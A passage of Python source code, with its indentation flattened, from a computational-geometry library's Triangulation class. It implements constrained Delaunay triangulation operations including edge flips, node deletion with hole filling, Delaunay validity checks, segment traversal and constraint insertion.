(that's not a hard and fast requirement, just makes it easier
to implemenet. There *does* have to be a potential cell on either
side).
"""
c_left,c_right=self.edges['cells'][j,:]
self.log.debug("Flipping edge %d, with cells %d, %d nodes %d,%d"%(j,c_left,c_right,
self.edges['nodes'][j,0],
self.edges['nodes'][j,1]) )
assert c_left>=0 # could be relaxed, at the cost of some complexity here
assert c_right>=0
# could work harder to preserve extra info:
#c_left_data = self.cells[c_left].copy()
#c_right_data = self.cells[c_right].copy()
# This is dangerous! - deleting the cells means that topo_sort is no good,
# and that breaks half-edge ops.
# moving to happen a bit later -
# self.delete_cell(c_left)
# self.delete_cell(c_right)
he_left=unstructured_grid.HalfEdge(self,j,0)
he_right=unstructured_grid.HalfEdge(self,j,1)
na,nc = self.edges['nodes'][j]
nd=he_left.fwd().node_fwd()
nb=he_right.fwd().node_fwd()
# DBG
if 0:
for n,label in zip( [na,nb,nc,nd],
"abcd" ):
plt.text( self.nodes['x'][n,0],
self.nodes['x'][n,1],
label)
# keep the time where the cells are deleted to a minimum
self.delete_cell(c_left)
self.delete_cell(c_right)
self.modify_edge(j,nodes=[nb,nd])
new_left =self.add_cell(nodes=[na,nb,nd])
new_right=self.add_cell(nodes=[nc,nd,nb])
return new_left,new_right
def delete_node(self,n):
""" Triangulation version implies cascade, but also
patches up the triangulation
"""
assert n>=0
N=self.Nnodes_valid()
if N==1:
super(Triangulation,self).delete_node(n)
elif N==2:
j=self.node_to_edges(n)[0]
self.delete_edge(j)
super(Triangulation,self).delete_node(n)
elif self.dim()==1:
self.delete_node_1d(n)
else:
self.delete_node_2d(n)
def delete_node_1d(self,n):
# Triangulation_2.h hands this off to the triangulation data structure
# That code looks like:
assert self.dim() == 1
assert self.Nnodes_valid() > 2
# Two cases - either n is at the end of a line of nodes,
# or it's between two nodes.
nbrs=self.node_to_nodes(n)
if len(nbrs)==1: # easy, we're at the end
j=self.nodes_to_edge(n,nbrs[0])
self.delete_edge(j)
super(Triangulation,self).delete_node(n)
else:
assert len(nbrs)==2
j1=self.nodes_to_edge(n,nbrs[0])
j2=self.nodes_to_edge(n,nbrs[1])
self.delete_edge(j1)
self.delete_edge(j2)
super(Triangulation,self).delete_node(n)
self.add_edge( nodes=nbrs )
def test_delete_node_dim_down(self,n):
# see Triangulation_2.h : test_dim_down
# test the dimensionality of the resulting triangulation
# upon removing of vertex v
# it goes down to 1 iff
# 1) any finite face is incident to v
# 2) all vertices are collinear
assert self.dim() == 2
for c in self.valid_cell_iter():
if n not in self.cell_to_nodes(c):
# There is a triangle not involving n
# deleting n would retain a 2D triangulation
return False
pnts=[self.nodes['x'][i]
for i in self.valid_node_iter()
if i!=n]
a,b = pnts[:2]
for c in pnts[2:]:
if robust_predicates.orientation(a,b,c) != 0:
return False
return True
def delete_node_2d(self,n):
if self.test_delete_node_dim_down(n):
# deleting n yields a 1D triangulation - no faces
for c in self.valid_cell_iter():
self.delete_cell(c)
# copy
for j in list(self.node_to_edges(n)):
self.delete_edge(j)
super(Triangulation,self).delete_node(n)
return
# first, make a hole around n
deletee=n
# new way
nbrs=self.angle_sort_adjacent_nodes(deletee)
edges_to_delete=[]
hole_nodes=[]
for nbrA,nbrB in circular_pairs(nbrs):
hole_nodes.append(nbrA)
he=self.nodes_to_halfedge(nbrA,nbrB)
if (he is None) or (he.cell()<0) or (n not in self.cell_to_nodes(he.cell())):
hole_nodes.append('inf')
edges_to_delete.append( self.nodes_to_edge( [deletee,nbrA] ) )
for j in edges_to_delete:
self.delete_edge_cascade(j)
super(Triangulation,self).delete_node(deletee)
# Use the boundary completion approach described in Devillers 2011
# it's not terribly slow, and can be done with the existing
# helpers.
self.fill_hole(hole_nodes)
def fill_hole(self,hole_nodes):
# track potentially multiple holes
# a few place use list-specific semantics - not ndarray
hole_nodes=list(hole_nodes)
holes_nodes=[ hole_nodes ]
while len(holes_nodes):
hole_nodes=holes_nodes.pop()
while 'inf' in hole_nodes[:2]:
hole_nodes = hole_nodes[1:] + hole_nodes[:1]
a,b=hole_nodes[:2]
self.log.debug("Considering edge %d-%d"%(a,b) )
# inf nodes:
# can't test any geometry. seems like we can only have boundary
# faces if the hole included an inf node.
# so drop it from candidates here, but remember that we saw it
# first, sweep through the candidates to test CCW
has_inf=False
c_cand1=hole_nodes[2:]
c_cand2=[]
for c in c_cand1:
if c=='inf':
has_inf=True
elif robust_predicates.orientation( self.nodes['x'][a],
self.nodes['x'][b],
self.nodes['x'][c] ) > 0:
c_cand2.append(c)
self.log.debug("After CCW tests, %s are left"%c_cand2)
while len(c_cand2)>1:
c=c_cand2[0]
for d in c_cand2[1:]:
tst=robust_predicates.incircle( self.nodes['x'][a],
self.nodes['x'][b],
self.nodes['x'][c],
self.nodes['x'][d] )
if tst>0:
self.log.debug("%d was inside %d-%d-%d"%(d,a,b,c))
c_cand2.pop(0)
break
else:
# c passed all the tests
c_cand2=[c]
break
# if the hole nodes are already all convex, then they already
# form the new convex hull - n was on the hull and simply goes
# away
if has_inf and not c_cand2:
c_cand2=['inf']
c='inf' # was this missing??
else:
c=c_cand2[0]
self.log.debug("Decided on %s-%s-%s"%(a,b,c))
# n.b. add_cell_and_edges is probably what is responsible
# for the painless dealing with collinear boundaries.
if c!='inf':
self.add_cell_and_edges( nodes=[a,b,c] )
# what hole to put back on the queue?
if len(hole_nodes)==3:
# finished this hole.
self.log.debug("Hole is finished")
continue
elif c==hole_nodes[2]:
self.log.debug("Hole is trimmed from front")
hole_nodes[:3] = [a,c]
holes_nodes.append( hole_nodes )
elif c==hole_nodes[-1]:
self.log.debug("Hole is trimmed from back")
hole_nodes=hole_nodes[1:] # drop a
self.log.debug(" New hole is %s"%hole_nodes)
holes_nodes.append( hole_nodes )
else:
self.log.debug("Created two new holes")
idx=hole_nodes.index(c)
h1=hole_nodes[1:idx+1]
h2=hole_nodes[idx:] + hole_nodes[:1]
self.log.debug(" New hole: %s"%h1)
self.log.debug(" New hole: %s"%h2)
holes_nodes.append( h1 )
holes_nodes.append( h2 )
# Make a check for the delaunay criterion:
def check_global_delaunay(self):
bad_checks=[] # [ (cell,node),...]
for c in self.valid_cell_iter():
nodes=self.cells['nodes'][c]
pnts=self.nodes['x'][nodes]
# brute force - check them all.
for n in self.valid_node_iter():
if n in nodes:
continue
t=self.nodes['x'][n]
check=robust_predicates.incircle(pnts[0],pnts[1],pnts[2],t)
if check>0:
# how do we check for constraints here?
# maybe more edge-centric?
# tests of a cell on one side of an edge against a node on the
# other is reflexive.
#
# could go through the edges of c,
msg="Node %d is inside the circumcircle of cell %d (%d,%d,%d)"%(n,c,
nodes[0],nodes[1],nodes[2])
self.log.error(msg)
bad_checks.append( (c,n) )
return bad_checks
def check_local_delaunay(self):
""" Check both sides of each edge - can deal with constrained edges.
"""
bad_checks=[] # [ (cell,node),...]
for j in self.valid_edge_iter():
if self.edges['constrained'][j]:
continue
c1,c2 = self.edge_to_cells(j)
if c1<0 or c2<0:
continue
# always check the smaller index -
# might help with caching later on.
c=min(c1,c2)
c_opp=max(c1,c2)
nodes=self.cells['nodes'][c]
pnts=self.nodes['x'][nodes]
# brute force - check them all.
for n in self.cell_to_nodes(c_opp):
if n in nodes:
continue
t=self.nodes['x'][n]
check=robust_predicates.incircle(pnts[0],pnts[1],pnts[2],t)
if check>0:
msg="Node %d is inside the circumcircle of cell %d (%d,%d,%d)"%(n,c,
nodes[0],nodes[1],nodes[2])
self.log.error(msg)
bad_checks.append( (c,n) )
raise Exception('fail')
return bad_checks
def check_orientations(self):
"""
Checks all cells for proper CCW orientation,
return a list of cell indexes of failures.
"""
bad_cells=[]
for c in self.valid_cell_iter():
node_xy=self.nodes['x'][self.cells['nodes'][c]]
if robust_predicates.orientation(*node_xy) <= 0:
bad_cells.append(c)
return bad_cells
def check_convex_hull(self):
# find an edge on the convex hull, walk the hull and check
# all consecutive orientations
e2c=self.edge_to_cells()
for j in self.valid_edge_iter():
if e2c[j,0]==self.INF_CELL:
he=self.halfedge(j,0)
break
elif e2c[j,1]==self.INF_CELL:
he=self.halfedge(j,1)
break
else:
assert False
he0=he
bad_hull=[]
while 1:
a=he.node_rev()
b=he.node_fwd()
he=he.fwd()
c=he.node_fwd()
if robust_predicates.orientation(*self.nodes['x'][[a,b,c]])>0:
bad_hull.append( [a,b,c])
if he==he0:
break
return bad_hull
def restore_delaunay(self,n):
""" n: node that was just inserted and may have adjacent cells
which do not meet the Delaunay criterion
"""
# n is node for Vertex_handle v
if self.dim() <= 1:
return
# a vertex is shared by faces, but "stores" only one face.
# Face_handle f=v->face();
# This code iterates over the faces adjacent to v
# in ccw order.
# Face_handle next;
# int i;
# Face_handle start(f);
# do {
# i = f->index(v);
# next = f->neighbor(ccw(i)); // turn ccw around v
# propagating_flip(f,i);
# f=next;
# } while(next != start);
# Shaky on the details, but for starters, try marking the CCW sweep
# based on neighbor nodes.
nbr_nodes=self.angle_sort_adjacent_nodes(n)
N=len(nbr_nodes)
for i in range(N):
trav=nbr_nodes[i]
trav_next=nbr_nodes[(i+1)%N]
c=self.nodes_to_cell( [n,trav,trav_next],fail_hard=False)
if c is not None:
for i in [0,1,2]:
if self.cells['nodes'][c,i]==n:
break
else:
assert False
if c is not None:
self.propagating_flip(c,i)
if self.post_check:
bad=self.check_local_delaunay()
if bad:
raise self.GridException("Delaunay criterion violated")
def propagating_flip(self,c,i):
# this is taken from non_recursive_propagating_flip
# c: cell, akin to face_handle
# i: index of the originating vertex in cell c.
# track the stack based on the halfedge one place CW
# from the edge to be flipped.
edges=[] # std::stack<Edge> edges;
vp = self.cells['nodes'][c,i] # const Vertex_handle& vp = f->vertex(i);
p=self.nodes['x'][vp] # const Point& p = vp->point();
# maybe better to use half-edges here.
# ordering of edges is slightly different than CGAL.
# if i gives the vertex,
# edges.push(Edge(f,i)); # this is the edge *opposite* vp
# for our ordering, need edge i+1
edges.append( self.cell_to_halfedge(c,i) )
while edges: # (! edges.empty()){
#const Edge& e = edges.top()
he=edges[-1]
he_flip=he.fwd()
# not sure about this part:
if self.edges['constrained'][he_flip.j]:
edges.pop()
continue
nbr=he_flip.cell_opp()
if nbr>=0:
# assuming that ON_POSITIVE_SIDE would mean that p (the location of the
# originating vertex) is *inside* the CCW-defined circle of the neighbor
# and would thus mean that the delaunay criterion is not satisfied.
#if ON_POSITIVE_SIDE != side_of_oriented_circle(n, p, true):
nbr_points= self.nodes['x'][ self.cells['nodes'][nbr] ]
p_in_nbr = robust_predicates.incircle(nbr_points[0],
nbr_points[1],
nbr_points[2],
p )
#if side_of_oriented_circle(n, p, true) == ON_POSITIVE_SIDE:
if p_in_nbr > 0:
self.flip_edge(he_flip.j)
extra=he.rev().opposite()
edges.append(extra)
continue
edges.pop() # drops last item
continue
def find_intersected_elements(self,nA,nB):
"""
returns a history of the elements traversed.
this includes:
('node',<node index>)
('edge',<half edge>)
('cell',<cell index>)
note that traversing along an edge is not included - but any
pair of nodes in sequence implies an edge between them.
"""
assert nA!=nB
assert not self.nodes['deleted'][nA]
assert not self.nodes['deleted'][nB]
# traversal could encounter multiple types of elements
trav=('node',nA)
A=self.nodes['x'][nA]
B=self.nodes['x'][nB]
history=[trav]
if self.dim()==1:
assert trav[0]=='node'
n_nbrs=self.node_to_nodes(trav[1])
for n_nbr in n_nbrs:
if n_nbr==nB:
history.append( ('node',nB) )
return history
if ordered( A,
self.nodes['x'][n_nbr],
B ):
trav=('node',n_nbr)
history.append( trav )
he=self.nodes_to_halfedge(nA,n_nbr)
break
else:
assert False # should never get here
while trav!=('node',nB):
he=he.fwd()
trav=('node',he.node_fwd())
history.append(trav)
return history
else:
while trav!=('node',nB):
# DBG!
if len(history)>1 and history[0]==history[1]:
import pdb
pdb.set_trace()
if trav[0]=='node':
ntrav=trav[1]
for c in self.node_to_cells(ntrav):
cn=self.cell_to_nodes(c)
# print "At node %d, checking cell %d (%s)"%(ntrav,c,cn)
ci_trav=list(cn).index(ntrav) # index of ntrav in cell c
nD=cn[(ci_trav+1)%3]
nE=cn[(ci_trav+2)%3]
if nD==nB or nE==nB:
trav=('node',nB)
# print "Done"
break
D=self.nodes['x'][nD]
oD=robust_predicates.orientation( A,B,D )
if oD>0:
continue
N=self.nodes['x'][ntrav]
if oD==0 and ordered(N,D,B):
# fell exactly on the A-B segment, and is in the
# right direction
trav=('node',nD)
break
E=self.nodes['x'][nE]
oE=robust_predicates.orientation( A,B,E )
if oE<0:
continue
if oE==0 and ordered(N,E,B):
# direction
trav=('node',nE)
break
j=self.cell_to_edges(c)[ (ci_trav+1)%3 ]
j_nbrs=self.edge_to_cells(j)
# AB crosses an edge - record the edge, and the side we are
# approaching from:
history.append( ('cell',c) )
if j_nbrs[0]==c:
trav=('edge',self.halfedge(j,0))
# making sure I got the 0/1 correct
assert trav[1].cell()==c
break
elif j_nbrs[1]==c:
trav=('edge',self.halfedge(j,1))
# ditto
assert trav[1].cell()==c
break
assert False
elif trav[0]=='edge':
he=trav[1].opposite()
#jnodes=self.edges['nodes'][j]
# have to choose between the opposite two edges or their common
# node:
c_next=he.cell()
history.append( ('cell',c_next) )
nD=he.fwd().node_fwd()
# print "Entering cell %d with nodes %s"%(c_next,self.cell_to_nodes(c_next))
oD=robust_predicates.orientation( A,B, self.nodes['x'][nD] )
if oD==0:
trav=('node',nD)
elif oD>0:
# going to cross
trav=('edge',he.fwd())
else:
trav=('edge',he.rev())
else:
assert False
history.append(trav)
return history
def locate_for_traversal_outside(self,p,p_other,loc_face,loc_type,loc_index):
"""
Helper method for locate_for_traversal()
handle the case where p is outside the triangulation, so loc_type
is either OUTSIDE_AFFINE_HULL or OUTSIDE_CONVEX_HULL
returns
('edge',<half-edge>)
('node',<node>)
(None,None) -- the line between p and p_other doesn't intersect the triangulation
"""
dim=self.dim()
if dim<0:
# there are no nodes, no work to be done
return (None,None)
elif dim==0:
# a single node. either we'll intersect it, or not.
N=six.next(self.valid_node_iter()) # get the only valid node
pN=self.nodes['x'][N]
# p_other could be coincident with N:
if (pN[0]==p_other[0]) and (pN[1]==p_other[1]):
return ('node',N)
# or we have to test for pN falling on the line between p,p_other
oN=robust_predicates.orientation(p, pN, p_other)
# either the segment passes through the one node, or doesn't intersect
# at all:
if oN==0 and ordered(p, pN, p_other):
return ('node',N)
else:
return (None,None)
elif dim==1:
# This could be much smarter, but current use case has this as a rare
# occasion, so just brute force it. find a half-edge, make sure it points
# towards us, and go.
if loc_type==self.OUTSIDE_AFFINE_HULL:
# we know that p is not on the line, but p_other could be.
# get an edge:
j=six.next(self.valid_edge_iter())
he=self.halfedge(j,0)
# get a half-edge facing p:
oj=robust_predicates.orientation(p,
self.nodes['x'][he.node_rev()],
self.nodes['x'][he.node_fwd()])
assert oj!=0.0 # that would mean we're collinear
# if the left side of he is facing us,
if oj>0:
# good - the left side of he, from rev to fwd, is facing p.
pass
else:
# flip it.
he=he.opposite()
# first - check against p_other - it could be on the same side
# of the line, on the line, or on the other side of the line.
ojo=robust_predicates.orientation(p_other,
self.nodes['x'][he.node_rev()],
self.nodes['x'][he.node_fwd()])
if ojo>0:
# p_other is on the same side of the line as p
return (None,None)
elif ojo==0:
# still have to figure out whether p_other is in the line or
# off the end.
o_loc_face,o_loc_type,o_loc_index=self.locate(p_other)
# just saw that it was in line, so better not be outside affine hull
assert o_loc_type!=self.OUTSIDE_AFFINE_HULL
if o_loc_type==self.OUTSIDE_CONVEX_HULL:
# a point off the line to a point beyond the ends of the line -
# no intersection.
return (None,None)
else:
if o_loc_type==self.IN_VERTEX:
return ('node',o_loc_index)
elif o_loc_type==self.IN_EDGE:
# This had been just returning the index, but we should
# be return half-edge.
# Make sure it faces p:
he=self.halfedge(o_loc_index,0)
oj2=robust_predicates.orientation(p,
self.nodes['x'][he.node_rev()],
self.nodes['x'][he.node_fwd()])
assert oj2!=0.0 # that would mean we're collinear
# if the left side of he is facing us,
if oj2>0:
# good - the left side of he, from rev to fwd, is facing p.
pass
else:
# flip it.
he=he.opposite()
return ('edge',he)
# shouldn't be possible
assert False
else: # p_other is on the other side
o_rev=robust_predicates.orientation(p,
self.nodes['x'][he.node_rev()],
p_other)
if o_rev==0.0:
return ('node',he.node_rev())
if o_rev > 0:
# rev is to the right of the p--p_other line,
# so walk forward...
A=p ; B=p_other
else:
# flip it around to keep the loop logic the same.
# note that this results in one extra loop, since rev
# becomes fwd and we already know that rev is not
# far enough over. whatever.
A=p_other ; B=p
he=he.opposite()
while 1:
n_fwd=he.node_fwd()
o_fwd=robust_predicates.orientation(A,
self.nodes['x'][n_fwd],
B)
if o_fwd==0.0:
return ('node',n_fwd)
if o_fwd<0:
return ('edge',he) # had been he.j, but we should return half-edge
# must go further!
he_opp=he.opposite()
he=he.fwd()
if he == he_opp: # went round the end - no intersection.
return (None,None)
else: # OUTSIDE_CONVEX_HULL
# points are in a line, and we're on that line but off the end.
# in this case, loc_index gives a nearby node
# so either p_other is also on the line, and the answer
# is ('node',loc_index)
# or it's not on the line, and the answer is (None,None)
orient = robust_predicates.orientation(p,
self.nodes['x'],
p_other)
if orient!=0.0:
return (None,None)
if ordered(p,self.nodes['x'][loc_index],p_other):
return ('node',loc_index)
else:
return (None,None)
elif dim==2:
# use that to get a half-edge facing p...
# had done this, but loc_index is already a half edge
# he_original = he = self.halfedge(loc_index,0)
he_original = he = loc_index
# make sure we got the one facing out
if he.cell()>=0:
he=he.opposite()
assert he.cell()<0
# brute force it
while 1:
# does this edge, or one of it's nodes, fit the bill?
n_rev=he.node_rev()
n_fwd=he.node_fwd()
o_j=robust_predicates.orientation(p,
self.nodes['x'][n_rev],
self.nodes['x'][n_fwd])
if o_j<0:
# this edge is facing away from p - not a candidate.
pass
else:
# note that we could be collinear, o_j==0.0.
o_rev=robust_predicates.orientation(p,self.nodes['x'][n_rev],p_other)
o_fwd=robust_predicates.orientation(p,self.nodes['x'][n_fwd],p_other)
if o_rev == 0.0:
if o_fwd == 0.0:
assert o_j==0.0
if ordered(p,self.nodes['x'][n_rev],self.nodes['x'][n_fwd]):
return ('node',n_rev)
else:
return ('node',n_fwd)
else:
return ('node',n_rev)
elif o_rev>0:
if o_fwd<0:
# found the edge!
return ('edge',he) # had been he.j
elif o_fwd==0:
return ('node',n_fwd)
else:
# the whole edge is on the wrong side of the segment
pass
else: # o_rev<0
pass
he=he.fwd()
if he==he_original:
# none satisfied the intersection
return (None,None)
def locate_for_traversal(self,p,p_other):
""" Given a point [x,y], reformat the result of
self.locate() to be compatible with the traversal
algorithm below. In cases where p is outside the
existing cells/edges/nodes, use the combination of p and p_other
to figure out the first element which would be hit.
"""
# Here - figure out which cell, edge or node corresponds to pB
loc_face,loc_type,loc_index=self.locate(p)
# not ready for ending point far away, outside
if loc_type in [self.OUTSIDE_AFFINE_HULL,self.OUTSIDE_CONVEX_HULL]:
return self.locate_for_traversal_outside(p,p_other,loc_face,loc_type,loc_index)
elif loc_type == self.IN_VERTEX:
if loc_face == self.INF_CELL:
feat=('node', loc_index)
else:
feat=('node', self.cells['nodes'][loc_face, loc_index])
elif loc_type == self.IN_EDGE:
# This should be a half-edge.
# The half-edge is chosen such that it either faces p_other, or
# if all four points are collinear, the ordering is rev -- p -- fwd -- p_other
# or rev -- p -- p_other -- fwd.
he=self.half_edge(loc_index,0) # start with arbitrary orientation
p_rev,p_fwd = self.nodes['x'][ he.nodes() ]
o_p_other = robust_predicates.orientation(p_other, p_rev, p_fwd)
if o_p==0.0:
# should this use rel_ordered instead?
if ordered(p_rev,p,p_other):
# good - we're looking along, from rev to fwd
pass
else:
he=he.opposite()
elif o_p<0:
he=he.opposite()
else:
pass
feat=('edge', he)
elif loc_type == self.IN_FACE:
feat=('cell', loc_face)
else:
assert False # shouldn't happen
return feat
def gen_intersected_elements(self,nA=None,nB=None,pA=None,pB=None):
"""
This is a new take on find_intersected_elements, with changes:
1. Either nodes or arbitrary points can be given
2. Elements are returned as a generator, rather than compiled into a list
and returned all at once.
3. Traversing along an edge was implied in the output of find_intersected_elements,
but is explicitly included here as a node--half_edge--node sequence.
returns a history of the elements traversed.
this includes:
('node',<node index>)
('edge',<half edge>)
('cell',<cell index>)
Notes:
The starting and ending features are included. If points were given
instead of nodes, then the feature here may be a cell, edge or node.
When the point is outside the convex hull or affine hull, then there is not a
corresponding feature (since otherwise one would assume that the feature
is truly intersected). The first feature returned is simply the first feature
encountered along the path, necessarily an edge or node, not a face.
"""
# verify that it was called correctly
if (nA is not None) and (nB is not None):
assert nA!=nB
assert (nA is None) or (not self.nodes['deleted'][nA])
assert (nB is None) or (not self.nodes['deleted'][nB])
assert (nA is None) != (pA is None)
assert (nB is None) != (pB is None)
dim=self.dim()
if nA is not None:
A=self.nodes['x'][nA]
trav=('node',nA)
else:
A=pA # trav set below
if nB is not None:
B=self.nodes['x'][nB]
end=('node',nB)
else:
B=pB # trav set below
if nA is None:
trav=self.locate_for_traversal(A,B)
if trav[0] is None:
return # there are not intersections
if nB is None:
end=self.locate_for_traversal(B,A)
# but the orientation of an edge has to be flipped
if end[0]=='edge':
end=(end[0],end[1].opposite())
# keep tracks of features crossed, including starting/ending
assert trav[0] is not None
history=[trav]
yield trav
if trav==end:
return
if dim==0:
# already yielded the one possible intersection
# but this case should be caught by the return just above
assert False
return
elif dim==1:
# in the case where p -- p_other crosses the 1-dimensional set of
# nodes, trav==end, and we already returned above.
# otherwise, we walk along the edges and nodes
if trav[0]=='node': # get a first half-edge going in the correct direction
n_nbrs=self.node_to_nodes(trav[1])
for n_nbr in n_nbrs:
if (ordered( A,
self.nodes['x'][n_nbr],
B ) or
np.all(B==self.nodes['x'][n_nbr])):
he=self.nodes_to_halfedge(nA,n_nbr)
break
else:
assert False
trav=('edge',he)
history.append(trav)
yield trav
else:
assert trav[0]=='edge'
he=trav[1]
while trav != end:
trav=('node',he.node_fwd())
history.append(trav)
yield trav
if trav==end:
break
he=he.fwd()
trav=('edge',he)
history.append(trav)
yield trav
return
else: # dim==2
while trav!=end:
if trav[0]=='node':
# Crossing through a node
ntrav=trav[1]
N=self.nodes['x'][ntrav]
for c in self.node_to_cells(ntrav):
cn=self.cell_to_nodes(c)
# print "At node %d, checking cell %d (%s)"%(ntrav,c,cn)
ci_trav=list(cn).index(ntrav) # index of ntrav in cell c
# the other two nodes of the cell
nD=cn[(ci_trav+1)%3]
nE=cn[(ci_trav+2)%3]
# maybe this can be folded in below
#if end[0]=='node' and (end[1] in [nD,nE]):
# # trav=('node',nB)
# trav=end
# break
# Here
D=self.nodes['x'][nD]
oD=robust_predicates.orientation( A,B,D )
if oD>0:
# D is to the right of E, and our target, A is to the right
# of both, so this cell is not good
continue
if oD==0 and np.dot(B-A,D-N)>0: # ordered(A,N,D):
# used to test for ordered(N,D,B), but B could be on the
# edge, at D, or beyond D. Test with A to know that the
# edge is going in the right direction, then check for where
# B might fall.
# HERE: This is a problem, though, because it's possible for
# A==N.
# What I really want is for A-B to be in the same direction
# as N-D.
# could test a dot product, but that invites some roundoff
# in sinister situations. The differencing is probably not
# a big deal - if we can represent the absolute values
# distinctly, then we can certainly represent their differences.
# the multiplication could lead to numbers which are too small
# to represent. Any of these issues require absurdly small
# values/offsets in the input nodes, and we have already
# established that these all lie on a line and are distinct.
#
# The possible positive orderings
# [A=N] -- D -- B
# A -- N -- D -- B
# [A=N] -- [D==B]
# [A=N] -- B -- D
#
# fell exactly on the A-B segment, and is in the
# right direction
# Announce the edge, which could be the end of the traversal
trav=('edge',self.nodes_to_halfedge(ntrav,nD))
history.append(trav)
yield trav
if trav==end:
return
# And on to the node:
trav=('node',nD)
break # and we've completed this step
E=self.nodes['x'][nE]
oE=robust_predicates.orientation( A,B,E )
if oE<0:
# A is to the left of E
continue
if oE==0 and np.dot(B-A,E-N): # ordered(A,N,E):
# Same as above - establish that it goes in the correct direction.
# again, the dot product is mildly dangerous
# again - fell exactly on the segment A-B, it's in the right
# direction.
trav=('edge',self.nodes_to_halfedge(ntrav,nE))
history.append(trav)
yield trav
if trav==end:
return
trav=('node',nE)
break
# if we get to here, then A--B passes through the cell, and either
# we stop at this cell, or A--B crosses the opposite edge:
trav=('cell',c)
if trav==end:
# don't try to traverse the cell - we're done!
# trav will get appended below
break
else:
# announce the cell, and move on to the edge
history.append(trav)
yield trav
trav=None # avoid confusion, clear this out
# AB crosses an edge - record the edge, and the side we are
# approaching from:
j=self.cell_to_edges(c)[ (ci_trav+1)%3 ]
j_nbrs=self.edge_to_cells(j)
if j_nbrs[0]==c:
trav=('edge',self.halfedge(j,0))
elif j_nbrs[1]==c:
trav=('edge',self.halfedge(j,1))
else:
assert False
# making sure I got the 0/1 correct
assert trav[1].cell()==c
break
elif trav[0]=='edge':
# trav[1].cell() is the cell we just left
# this then is the half-edge facing the cell we're
# entering
he=trav[1].opposite()
c_next=he.cell()
trav=('cell',c_next)
if trav==end:
pass # done!
else:
# have to choose between the opposite two edges or their common
# node.
# record the cell we just passed through
history.append(trav)
yield trav
nD=he.fwd().node_fwd()
# print "Entering cell %d with nodes %s"%(c_next,self.cell_to_nodes(c_next))
oD=robust_predicates.orientation( A,B, self.nodes['x'][nD] )
if oD==0:
trav=('node',nD)
elif oD>0:
# going to cross the edge "on the right" (I think)
trav=('edge',he.fwd())
else:
# going to cross the edge "on the left"
trav=('edge',he.rev())
else:
assert False
history.append(trav)
yield trav
return
def add_constraint(self,nA,nB):
jAB=self.nodes_to_edge([nA,nB])
if jAB is not None:
# no work to do - topology already good.
if self.edges['constrained'][jAB]:
raise DuplicateConstraint(nodes=[nA,nB])
self.edges['constrained'][jAB]=True
return jAB
# inserting an edge from 0-5.
int_elts=self.find_intersected_elements(nA,nB)
# Now we need to record the two holes bordered the new edge:
left_nodes=[nA] # will be recorded CW
right_nodes=[nA] # will be recorded CCW
# Iterate over the crossed elements, checking that the new
# edge doesn't encounter any collinear nodes or other constrained
# edges. Build up the nodes of the holes at the same time.
dead_cells=[]
dead_edges=[]
for elt in int_elts[1:-1]:
if elt[0]=='node':
raise self.ConstraintCollinearNode("Constraint intersects a node",
node=elt[1])
if elt[0]=='cell':
dead_cells.append(elt[1])
if elt[0]=='edge':
if self.edges['constrained'][ elt[1].j ]:
raise IntersectingConstraints("Constraint intersects a constraint",
edge=elt[1].j )
next_left=elt[1].node_fwd()
if left_nodes[-1]!=next_left:
left_nodes.append(next_left)
next_right= elt[1].node_rev()
if right_nodes[-1]!=next_right:
right_nodes.append(next_right)
dead_edges.append(elt[1].j)
left_nodes.append(nB)
right_nodes.append(nB)
left_nodes = left_nodes[::-1]
# tricky business here
# but the delaunay business is only invoked on node operations - leaving
# the edge/cell operations free and clear to violate invariants
for c in dead_cells:
self.delete_cell(c)
for j in dead_edges:
self.delete_edge(j)
j=self.add_edge(nodes=[nA,nB],constrained=True)
# and then sew up the holes!
self.fill_hole( left_nodes )
self.fill_hole( right_nodes )
return j
def remove_constraint(self,nA=None,nB=None,j=None):
""" Assumes that there exists a constraint between nodes
nA and nB (or that the edge given by j is constrained).
The constrained flag is removed for the edge, and if
the Delaunay criterion is no longer satisfied edges are
flipped as needed.
"""
if j is None:
j=self.nodes_to_edge([nA,nB])
assert self.edges['constrained'][j]
self.edges['constrained'][j]=False
c1,c2=self.edge_to_cells(j)
if (c1>=0) and (c2>=0):
c=c1 # can we just propagate from one side?
for ni,n in enumerate(self.cell_to_nodes(c1)):
if n not in self.edges['nodes'][j]:
self.propagating_flip(c1,ni)
break
if self.post_check:
self.check_local_delaunay()
def node_to_constraints(self,n):
return [j
for j in self.node_to_edges(n)
if self.edges['constrained'][j]]
def init_from_grid(self,g,node_coordinate='x',set_valid=False,
valid_min_area=1e-2,on_intersection='exception'):
"""
Initialize from the nodes and edges of an existing grid, making
existing edges constrained
node_coordinate: supply the name of an alternate coordinate defined
on the nodes. g.nodes[node_coordinate] should be an [Ncell,2] field.
set_valid: if True, add a 'valid' field for cells, and set to Tru
for cells of the triangulation that have finite area and fall
within the src grid g.
on_intersection:
'exception': intersecting edges in the input grid raise an error.
'insert': at intersecting edges construct and insert a new node.
"""
if set_valid:
self.add_cell_field('valid',np.zeros(self.Ncells(),np.bool8),
on_exists='pass')
# Seems that the indices will get misaligned if there are
# deleted nodes.
# TODO: add node index mapping code here.
assert np.all( ~g.nodes['deleted'] )
self.bulk_init(g.nodes[node_coordinate][~g.nodes['deleted']])
all_segs=[ g.edges['nodes'][j]
for j in g.valid_edge_iter() ]
while all_segs:
nodes=all_segs.pop(0)
if on_intersection=='exception':
self.add_constraint( *nodes )
else:
self.add_constraint_and_intersections( *nodes )
if set_valid:
from shapely import geometry
self.cells['valid']=~self.cells['deleted']
# Maybe unnecessary. Had some issues with 0 fill values here.
self.cells['_area']=np.nan
self.cells['_center']=np.nan
areas=self.cells_area()
self.cells['valid'][areas<=valid_min_area]=False
poly=g.boundary_polygon()
centroids=self.cells_centroid()
for c in np.nonzero(self.cells['valid'])[0]:
if not poly.contains( geometry.Point(centroids[c]) ):
self.cells['valid'][c]=False
def add_constraint_and_intersections(self,nA,nB,on_exists='exception'):
"""
Like add_constraint, but in the case of intersections with existing constraints
insert new nodes as needed and update existing and new constrained edges.
"""
all_segs=[ [nA,nB] ]
result_nodes=[nA]
result_edges=[]
while all_segs:
nA,nB=all_segs.pop(0)
try:
j=self.add_constraint(nA,nB)
except IntersectingConstraints as exc:
if isinstance(exc,ConstraintCollinearNode):
all_segs.insert(0, [nA,exc.node] )
all_segs.insert(1, [exc.node,nB] )
continue
else:
j_other=exc.edge
assert j_other is not None
segA=self.nodes['x'][self.edges['nodes'][j_other]]
segB=self.nodes['x'][[nA,nB]]
x_int,alphas=segment_segment_intersection(segA,segB)
# Getting an error where x_int is one of the endpoints of
# segA. This is while inserting a contour that ends on
# the boundary.
n_new=self.split_constraint(j=j_other,x=x_int)
if nB!=n_new:
